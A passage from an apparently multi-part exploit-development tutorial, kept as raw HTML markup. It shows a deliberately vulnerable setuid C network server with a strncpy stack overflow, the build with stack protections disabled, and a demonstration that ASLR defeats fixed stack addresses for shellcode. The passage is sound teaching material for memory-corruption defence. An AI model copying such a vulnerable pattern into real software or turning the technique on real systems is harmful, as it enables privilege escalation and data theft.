class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[])/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;Wrong password: quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"16/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"p/spanspan class="p"),/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendtoken/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"TFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"TFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p",/spanspan class="w" /spanspan class="n"i/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"atoi/spanspan class="p"(/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="n"CNUM/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"5/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe main difference here is that the input is converted to a number and if that number is equal to code58623/code, the contents of a different file (codetoken/code) is sent to the client./p h3The Fix/h3 pThe fix is the same as in part 3. The vulnerable code is the call to strncpy on line 102./p h2Setting Up The Environment/h2 pThe environment is going to be exactly the same as in part 3, except we have a new file and ASLR will be enabled./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanadduser appuser/span span class="code-line"span class="go"Adding user `appuser#39; .../span/span span class="code-line"span class="go"Adding new group `appuser#39; (1002) .../span/span span class="code-line"span class="go"Adding new user `appuser#39; (1002) with group `appuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/appuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"root@dev:~# /spanls/span span class="code-line"span class="go"app-net.c/span/span span class="code-line"span class="gp"root@dev:~# /spangcc -z execstack -fno-stack-protector -o app-net app-net.c/span span class="code-line"span class="gp"root@dev:~# /spancp app-net /home/appuser//span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod u+s app-net /span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spancat secret.txt /span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanspan class="nb"echo/span span class="s2"quot;084934-3492048234728-4847847quot;/span gt; token/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l token /span span class="code-line"span class="go"-rw-r--r-- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod span class="m"600/span token /span span class="code-line"span class="gp"root@dev:/home/appuser# /spancat token /span span class="code-line"span class="go"084934-3492048234728-4847847/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spansu - appuser/span span class="code-line"span class="gp"appuser@dev:~$ /spanls -l/span span class="code-line"span class="go"total 20/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="go"-rw------- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat secret.txt/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat token/span span class="code-line"span class="go"cat: token: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pThe big difference here is that we did not change the content of the file code/proc/sys/kernel/randomize_va_space/code, if the value of this wasn't 2, then run the following command to change it: codeecho 2 gt; /proc/sys/kernel/randomize_va_space/code/p pThis means that ASLR will be enabled. We can prove this by looking at the memory map of a process over multiple executions:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/span span class="code-line"span class="normal"77/span/span span class="code-line"span class="normal"78/span/span span class="code-line"span class="normal"79/span/span span class="code-line"span class="normal"80/span/span span class="code-line"span class="normal"81/span/span span class="code-line"span class="normal"82/span/span span class="code-line"span class="normal"83/span/span span class="code-line"span class="normal"84/span/span span class="code-line"span class="normal"85/span/span span class="code-line"span class="normal"86/span/span span class="code-line"span class="normal"87/span/span span class="code-line"span class="normal"88/span/span span class="code-line"span class="normal"89/span/span span class="code-line"span class="normal"90/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"0838a000-083ab000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b74e9000-b7528000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b7528000-b7646000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b7646000-b7647000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7647000-b77a4000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a4000-b77a5000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a5000-b77a7000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a7000-b77a8000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a8000-b77ab000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77b7000-b77b8000 r--p 00000000 08:01 961741 /usr/lib/locale/gez_ET@abegede/LC_NUMERIC/span/span span class="code-line"span class="go"b77b8000-b77b9000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b77b9000-b77ba000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b77ba000-b77bb000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b77bb000-b77bc000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b77bc000-b77bd000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b77bd000-b77be000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b77be000-b77bf000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b77bf000-b77c0000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b77c0000-b77c7000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b77c7000-b77c8000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b77c8000-b77ca000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77ca000-b77cb000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b77cb000-b77e7000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77e7000-b77e8000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77e8000-b77e9000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfa32000-bfa53000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08dd9000-08dfa000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b74de000-b751d000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b751d000-b763b000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b763b000-b763c000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b763c000-b7799000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b7799000-b779a000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779a000-b779c000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779c000-b779d000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779d000-b77a0000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77ac000-b77ad000 r--p 00000000 08:01 961741 /usr/lib/locale/gez_ET@abegede/LC_NUMERIC/span/span span class="code-line"span class="go"b77ad000-b77ae000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b77ae000-b77af000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b77af000-b77b0000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b77b0000-b77b1000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b77b1000-b77b2000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b77b2000-b77b3000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b77b3000-b77b4000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b77b4000-b77b5000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b77b5000-b77bc000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b77bc000-b77bd000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b77bd000-b77bf000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77bf000-b77c0000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b77c0000-b77dc000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77dc000-b77dd000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77dd000-b77de000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfad4000-bfaf5000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"09908000-09929000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b7435000-b7474000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b7474000-b7592000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b7592000-b7593000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7593000-b76f0000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f0000-b76f1000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f1000-b76f3000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f3000-b76f4000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f4000-b76f7000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7703000-b7704000 r--p 00000000 08:01 961741 /usr/lib/locale/gez_ET@abegede/LC_NUMERIC/span/span span class="code-line"span class="go"b7704000-b7705000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b7705000-b7706000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b7706000-b7707000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b7707000-b7708000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b7708000-b7709000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b7709000-b770a000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b770a000-b770b000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b770b000-b770c000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b770c000-b7713000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b7713000-b7714000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b7714000-b7716000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7716000-b7717000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b7717000-b7733000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b7733000-b7734000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b7734000-b7735000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfc79000-bfc9a000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"/code/pre/div /td/tr/table pThis command displays the memory ranges of each memory segment inside the codecat/code commands own virtual memory space./p pAs you can see, all of the memory segments are changing their ranges except for the top 3. These top 3 belong to the actual code of the application./p pThis means that we can only predict memory addresses of the actual code of the application and nothing that is dynamically loaded or writable./p pEvery payload we have sent until now has been placed on the codestack/code, which is at the very bottom of the memory segment list on the output and this section of memory isn't static so we can no longer predict the address of our payload (the shellcode)./p h2Testing The App/h2 table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table pWe already know a 